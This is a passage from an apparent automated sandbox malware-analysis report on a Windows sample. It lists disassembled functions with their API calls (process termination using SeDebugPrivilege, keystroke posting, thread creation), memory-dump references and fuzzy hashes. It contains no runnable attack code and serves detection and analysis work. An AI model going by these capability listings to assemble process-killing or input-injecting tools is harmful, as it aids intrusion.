                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InvalidateRect
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 634782764-0
                                                                                                                    • Opcode ID: 9a73203843335d24c2bfadaf2e2c7c3c17bf82ee82268904bdc161a4f7581d86
                                                                                                                    • Instruction ID: bc296c8ae79bd896584e2683ba902c0caed88d995cde02a07818286bed0e81c5
                                                                                                                    • Opcode Fuzzy Hash: 9a73203843335d24c2bfadaf2e2c7c3c17bf82ee82268904bdc161a4f7581d86
                                                                                                                    • Instruction Fuzzy Hash: 1151C430600254BEEB279F24DC85FAD7B69EB07314F600221FA54EA1F1CF76A980CB40
                                                                                                                    Function 00322B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0035C2F7
                                                                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0035C319
                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0035C331
                                                                                                                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0035C34F
                                                                                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0035C370
                                                                                                                    • DestroyIcon.USER32(00000000), ref: 0035C37F
                                                                                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0035C39C
                                                                                                                    • DestroyIcon.USER32(?), ref: 0035C3AB
                                                                                                                      • Part of subcall function 003AA4AF: DeleteObject.GDI32(00000000), ref: 003AA4E8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2819616528-0
                                                                                                                    • Opcode ID: b7de960be1b44c3768c35c77eaedc1b8ee14dd117d8ee1f431ccb12e2223d373
                                                                                                                    • Instruction ID: 56fa437d78fde1c226670f0fa8898e74c4785e95e62b66c654a249d42e80f4d0
                                                                                                                    • Opcode Fuzzy Hash: b7de960be1b44c3768c35c77eaedc1b8ee14dd117d8ee1f431ccb12e2223d373
                                                                                                                    • Instruction Fuzzy Hash: 92518974A10319EFDB22DF64DC45FAB3BB9EB08315F104628F9029B6A0DB74AD90DB50
                                                                                                                    Function 0037966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0037A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0037A84C
                                                                                                                      • Part of subcall function 0037A82C: GetCurrentThreadId.KERNEL32 ref: 0037A853
                                                                                                                      • Part of subcall function 0037A82C: AttachThreadInput.USER32(00000000,?,00379683,?,00000001), ref: 0037A85A
                                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 0037968E
                                                                                                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 003796AB
                                                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 003796AE
                                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 003796B7
                                                                                                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 003796D5
                                                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 003796D8
                                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 003796E1
                                                                                                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 003796F8
                                                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 003796FB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2014098862-0
                                                                                                                    • Opcode ID: 11e479c2fde135f70260da199db60bf85c425f9b0218997864741e16673d8d2f
                                                                                                                    • Instruction ID: fcac7971f78588b59bf744446262946169cc6b3d7f54669b35a5666a24c7bc80
                                                                                                                    • Opcode Fuzzy Hash: 11e479c2fde135f70260da199db60bf85c425f9b0218997864741e16673d8d2f
                                                                                                                    • Instruction Fuzzy Hash: A5110871910618BFF6216FB0DC89F6A7F1DEB4E760F100425F244AB0E0C9F25C11DAA4
                                                                                                                    Function 00378921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0037853C,00000B00,?,?), ref: 0037892A
                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,0037853C,00000B00,?,?), ref: 00378931
                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0037853C,00000B00,?,?), ref: 00378946
                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,0037853C,00000B00,?,?), ref: 0037894E
                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,0037853C,00000B00,?,?), ref: 00378951
                                                                                                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0037853C,00000B00,?,?), ref: 00378961
                                                                                                                    • GetCurrentProcess.KERNEL32(0037853C,00000000,?,0037853C,00000B00,?,?), ref: 00378969
                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,0037853C,00000B00,?,?), ref: 0037896C
                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00378992,00000000,00000000,00000000), ref: 00378986
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1957940570-0
                                                                                                                    • Opcode ID: 2e5bfe3a33a9d4035379810d40e110cd6f82f576dbc2a4fee33ad6446ccfea5f
                                                                                                                    • Instruction ID: e87aeb090955ce2a678c833f94ea28b1a5862d6cfd57fd7b1546d9f8ab2c8c27
                                                                                                                    • Opcode Fuzzy Hash: 2e5bfe3a33a9d4035379810d40e110cd6f82f576dbc2a4fee33ad6446ccfea5f
                                                                                                                    • Instruction Fuzzy Hash: 5A01BBB5240308FFE761ABA5DC4DF6B3BACEB8A711F418421FA05DB1A1DA749800CB20
                                                                                                                    Function 00399B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                    • API String ID: 0-572801152
                                                                                                                    • Opcode ID: cfc0217a138cccc68b6fb6dc58e7131388a54963122cbf6d8a6a532dcbcc7b8a
                                                                                                                    • Instruction ID: 6a96082879f15b160a7cf584d8c39c3203faf7801543c61f8271436c0593b295
                                                                                                                    • Opcode Fuzzy Hash: cfc0217a138cccc68b6fb6dc58e7131388a54963122cbf6d8a6a532dcbcc7b8a
                                                                                                                    • Instruction Fuzzy Hash: 43C18171E0021A9FDF11DF99D884BAEB7F9FB48314F15846EE905AB280E770AD45CB90
                                                                                                                    Function 0039975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0037710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00377044,80070057,?,?,?,00377455), ref: 00377127
                                                                                                                      • Part of subcall function 0037710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00377044,80070057,?,?), ref: 00377142
                                                                                                                      • Part of subcall function 0037710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00377044,80070057,?,?), ref: 00377150
                                                                                                                      • Part of subcall function 0037710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00377044,80070057,?), ref: 00377160
                                                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00399806
                                                                                                                    • _memset.LIBCMT ref: 00399813
                                                                                                                    • _memset.LIBCMT ref: 00399956
                                                                                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00399982
                                                                                                                    • CoTaskMemFree.OLE32(?), ref: 0039998D
                                                                                                                    Strings
                                                                                                                    • NULL Pointer assignment, xrefs: 003999DB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                    • String ID: NULL Pointer assignment
                                                                                                                    • API String ID: 1300414916-2785691316
                                                                                                                    • Opcode ID: b74cc30dc4684e9c16682f895ed581ecc3dd08b4b32b9672399f40e8bb2f71d6
                                                                                                                    • Instruction ID: 0164397e940e246db2f874167ef4b03d13562a2b4f719e3820f04b0d702b8a4a
                                                                                                                    • Opcode Fuzzy Hash: b74cc30dc4684e9c16682f895ed581ecc3dd08b4b32b9672399f40e8bb2f71d6
                                                                                                                    • Instruction Fuzzy Hash: E1910671D00229ABDF22DFA5DC45ADEBBB9AF09310F10415AF419AB251DB71AA44CFA0
                                                                                                                    Function 003A6D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 003A6E24
                                                                                                                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 003A6E38
                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 003A6E52
                                                                                                                    • _wcscat.LIBCMT ref: 003A6EAD
                                                                                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 003A6EC4
                                                                                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 003A6EF2
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Window_wcscat
                                                                                                                    • String ID: SysListView32
                                                                                                                    • API String ID: 307300125-78025650
                                                                                                                    • Opcode ID: b69b0b1b335c22d58cd5a132c83ad637cd34d45c8a522a9fc76920175c544db6
                                                                                                                    • Instruction ID: fa3bfb6011db3ebf796560a3d01f26979f57cbb9264e7ef77b08e5ebcb00019f
                                                                                                                    • Opcode Fuzzy Hash: b69b0b1b335c22d58cd5a132c83ad637cd34d45c8a522a9fc76920175c544db6
                                                                                                                    • Instruction Fuzzy Hash: 1A41A271A00348EFDB229FA4CC86FEE77E8EF09350F15052AF545EB291D6719D848B60
                                                                                                                    Function 0039E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00383C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00383C7A
                                                                                                                      • Part of subcall function 00383C55: Process32FirstW.KERNEL32(00000000,?), ref: 00383C88
                                                                                                                      • Part of subcall function 00383C55: CloseHandle.KERNEL32(00000000), ref: 00383D52
                                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0039E9A4
                                                                                                                    • GetLastError.KERNEL32 ref: 0039E9B7
                                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0039E9E6
                                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 0039EA63
                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 0039EA6E
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0039EAA3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                    • String ID: SeDebugPrivilege
                                                                                                                    • API String ID: 2533919879-2896544425
                                                                                                                    • Opcode ID: 8e45172a81a80fcd0dd074bee124faff9ea3b9adbd9e43868cfe632458159ce8
                                                                                                                    • Instruction ID: edf51ee5a9712f235d1cc2edbcb16cdcbb70a50c0276539b3738ff2dbf086ab7
                                                                                                                    • Opcode Fuzzy Hash: 8e45172a81a80fcd0dd074bee124faff9ea3b9adbd9e43868cfe632458159ce8
                                                                                                                    • Instruction Fuzzy Hash: D641AA712002019FDB26EF64DCA6F6EB7A9AF45314F188459F9469F3D2CB74E804CB91
                                                                                                                    Function 00382F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadIconW.USER32(00000000,00007F03), ref: 00383033
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: IconLoad
                                                                                                                    • String ID: blank$info$question$stop$warning
                                                                                                                    • API String ID: 2457776203-404129466
                                                                                                                    • Opcode ID: 112b3476e8af870f878a28ea5ef3b3fe5dfd84e6a21da0f5a13266199b5e159b
                                                                                                                    • Instruction ID: bffd75d0de18f94b35ddabdc5c716c4b3105cea123b06bbf7688a79c222abeda
                                                                                                                    • Opcode Fuzzy Hash: 112b3476e8af870f878a28ea5ef3b3fe5dfd84e6a21da0f5a13266199b5e159b
                                                                                                                    • Instruction Fuzzy Hash: CD112B72348346BED717AB54EC42CAB779C9F16760F1000AAF901BA381DB71BF4057A5
                                                                                                                    Function 003842F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00384312
                                                                                                                    • LoadStringW.USER32(00000000), ref: 00384319
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0038432F
                                                                                                                    • LoadStringW.USER32(00000000), ref: 00384336
                                                                                                                    • _wprintf.LIBCMT ref: 0038435C
                                                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0038437A
                                                                                                                    Strings
                                                                                                                    • %s (%d) : ==> %s: %s %s, xrefs: 00384357
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                    • API String ID: 3648134473-3128320259
                                                                                                                    • Opcode ID: c7aaab879c7ca8cde70291bcde899c813ebec278b7f6dd0f6025b0b0a4206721
                                                                                                                    • Instruction ID: f09203ed36b2a2fb478cb35b53ab4fbfd2c418e314a17f6be795983fe01ba12b
                                                                                                                    • Opcode Fuzzy Hash: c7aaab879c7ca8cde70291bcde899c813ebec278b7f6dd0f6025b0b0a4206721
                                                                                                                    • Instruction Fuzzy Hash: F30186F7940208BFE752ABE0DD89EF7776CDB09300F0005A5B745E6051EA745E854B74
                                                                                                                    Function 003AD43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00322612: GetWindowLongW.USER32(?,000000EB), ref: 00322623
                                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 003AD47C
                                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 003AD49C
                                                                                                                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 003AD6D7
                                                                                                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 003AD6F5
                                                                                                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 003AD716
                                                                                                                    • ShowWindow.USER32(00000003,00000000), ref: 003AD735
                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 003AD75A
                                                                                                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 003AD77D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1211466189-0
                                                                                                                    • Opcode ID: 5f96f10c3f69d8e916b82559992f99ac2e989453fc4ba028923c11dffff09d18
                                                                                                                    • Instruction ID: 614a52340f50ccd6accd8d6c18a0107828064742e2d32938f29dbb562c3e6154
                                                                                                                    • Opcode Fuzzy Hash: 5f96f10c3f69d8e916b82559992f99ac2e989453fc4ba028923c11dffff09d18
                                                                                                                    • Instruction Fuzzy Hash: E0B1AB70600215AFDF1ACF68C9897AD7BB1FF06700F098169EC4A9EAA5D735A950CB90
                                                                                                                    Function 00322A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0035C1C7,00000004,00000000,00000000,00000000), ref: 00322ACF
                                                                                                                    • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0035C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00322B17
                                                                                                                    • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0035C1C7,00000004,00000000,00000000,00000000), ref: 0035C21A
                                                                                                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0035C1C7,00000004,00000000,00000000,00000000), ref: 0035C286
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ShowWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1268545403-0
                                                                                                                    • Opcode ID: fff122a085caf8f38a4dc04df2ff59d803597f88f71b7aec44710b7d8c5a4259
                                                                                                                    • Instruction ID: c3411fee24351003a274f9aa71d2a0bdf9e4e8e1f0d135f675bddfe64972e2f6
                                                                                                                    • Opcode Fuzzy Hash: fff122a085caf8f38a4dc04df2ff59d803597f88f71b7aec44710b7d8c5a4259
                                                                                                                    • Instruction Fuzzy Hash: 13412A31618790BECB379B68EC88B6B7BDAAB46304F15882DE44786D70CE719885D750
                                                                                                                    Function 003870C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 003870DD
                                                                                                                      • Part of subcall function 00340DB6: std::exception::exception.LIBCMT ref: 00340DEC
                                                                                                                      • Part of subcall function 00340DB6: __CxxThrowException@8.LIBCMT ref: 00340E01
                                                                                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00387114
                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00387130
                                                                                                                    • _memmove.LIBCMT ref: 0038717E
                                                                                                                    • _memmove.LIBCMT ref: 0038719B
                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 003871AA
                                                                                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 003871BF
                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 003871DE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
